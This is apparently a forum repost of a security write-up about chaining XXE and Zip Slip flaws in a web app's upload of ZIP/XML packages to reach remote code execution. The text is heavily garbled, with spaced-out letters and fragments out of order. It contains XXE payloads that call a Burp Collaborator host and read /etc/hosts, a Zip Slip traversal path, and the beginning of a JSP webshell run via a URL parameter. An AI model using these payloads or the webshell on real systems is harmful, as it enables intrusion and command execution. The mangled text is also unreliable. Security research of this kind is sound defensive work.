[15252] 2020-04-14_利用XML和ZIP格式解析漏洞实现RCE

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2020-04-14_利用XML和ZIP格式解析漏洞实现RCE X M L Z I P R C E c l o u d s   F r e e B u f   2 0 2 0 - 0 4 - 1 4 W r i t e u p X X E Z I P W e b W e b s h e l l R C E W e b W e b . x y z G o o g l e . x y z X M L Z I P X M L u n z i p . d o c x u n z i p   D o c u m e n t . d o c x . a p k A n d r o i d M a n i f e s t . x m l Z I P X M L Z I P X M L Z I P 使 X M L Z I P X M L   E x t e r n a l   E n t i t i e s   X M L X M L e x t e r n a l   e n t i t y X M L 便 X M L X X E O W A S P X X E X M L X M L X M L X M L J A V A X M L X X E 使 X X E Z I P Z I P Z I P 2 0 1 8 S n y k Z i p   S l i p Z i p   S l i p Z I P J A V A Z I P . . / . . / . . / . . / e v i l 1 / e v i l 2 / e v i l . s h Z I P Z I P u n z i p e v i l . s h / e v i l 1 / e v i l 2 c r o n   j o b r o o t w e b s h e l l X X E Z I P J A V A Z i p   S l i p J a v a S c r i p t R u b y . N E T     G o z i p J A V A S t a c k O v e r f l o w X X E W e b X M L X M L Z I P m y p a c k a g e . x y z m a n i f e s t . x m l m y p a c k a g e . x y z W e b X S S X M L X M L X S S X M L < h t m l t a g s > W e b A r c h i v e :     D o c u m e n t . d o c x             i n f l a t i n g :   [ C o n t e n t _ T y p e s ] . x m l                       i n f l a t i n g :   _ r e l s / . r e l s                                       i n f l a t i n g :   w o r d / _ r e l s / d o c u m e n t . x m l . r e l s                 i n f l a t i n g :   w o r d / < ? x m l   v e r s i o n = " 1 . 0 " ? >         < p a c k a g e i n f o >                 < t i t l e > M y   A w e s o m e   P a c k a g e < / t i t l e >                 < a u t h o r > J o h n   D o e < / a u t h o r >                 < d o c u m e n t a t i o n > h t t p s : / / g o o g l e . c o m < / d o c u m e n t a t i o n >                
X X E X M L B u r p   C o l l a b o r a t o r X X E X X E   P a y l o a d X X E W e b X M L / e t c / h o s t s R C E X X E W e b Z I P W e b Z I P m a n i f e s t . x m l X X E Z I P P a y l o a d - e v i l a r c P y t h o n P a y l o a d X X E f i l e : / / / n a m e o f d i r e c t o r y W e b / h o m e / w e b / r e s o u r c e s / t e m p l a t e s / s i t e m a p . j s p W e b h t t p s : / / v u l n a p p . c o m / s i t e m a p w e b s h e l l 访 w e b s h e l l W e b s h e l l W e b h t t p s : / / v u l n a p p . c o m / s i t e m a p ? s p a c e r a c c o o o n = l s 访 W e b s h e l l 西 h t t p s : / / v u l n a p p . c o m / s i t e m a p 怀 W e b h t t p s : / / v u l n a p p . c o m / s i t e m a p 访 w e b s h e l l 访 w e b s h e l l l s W e b R C E ( C o n v e n t i o n   o v e r   C o n f i g u r a t i o n ) 使 便 W r i t e u p W e b J A V A O W A S P     S n y k J A V A X M L Z I P J A V A X M L Z I P * s p a c e r a c c o o n c l o u d s     F r e e B u f . C O M < ? x m l   v e r s i o n = " 1 . 0 " ? >         < ! D O C T Y P E   t i t l e   [ < ! E N T I T Y   x x e   S Y S T E M   ' h t t p s : / / m y c o l l a b . b u r p c o l l a b o r a t o r . n e t ' > ] >         < p a c k a g e i n f o >                 < t i t l e > M y   A w e s o m e   P a c k a g e & x x e ; < / t i t l e >                 < ? x m l   v e r s i o n = " 1 . 0 " ? >         < ! D O C T Y P E   t i t l e   [ < ! E N T I T Y   x x e   S Y S T E M   ' f i l e : / / / e t c / h o s t s ' > ] >         < p a c k a g e i n f o >                 < t i t l e > M y   A w e s o m e   P a c k a g e & x x e ; < / t i t l e >                 < a u t h o r > J o h n   D o e < / a u t h o r < % @   p a g e   i m p o r t = " j a v a . u t i l . * , j a v a . i o . * " % >         < %                 i f   ( r e q u e s t . g e t P a r a m e t e r ( " s p a c e r a c c o o n " )   ! =   n u l l )   {                         o u t . p r i n t l n ( " C o m m a n d :   "   +   r e q u e s t . g e t P a r a m e t e r ( " s p a c e r a c c o o n "

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则